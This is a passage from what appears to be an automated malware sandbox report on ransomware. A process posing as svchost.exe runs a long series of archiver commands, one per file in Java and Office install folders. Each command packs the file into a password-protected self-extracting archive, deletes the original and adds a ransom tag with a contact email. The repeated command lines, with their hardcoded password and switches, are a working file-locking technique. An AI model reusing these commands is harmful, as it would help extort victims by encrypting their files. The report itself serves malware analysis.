  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1200
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2296
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1252
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\bin\server\Xusage.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\lib\jvm.hprof.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\README.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
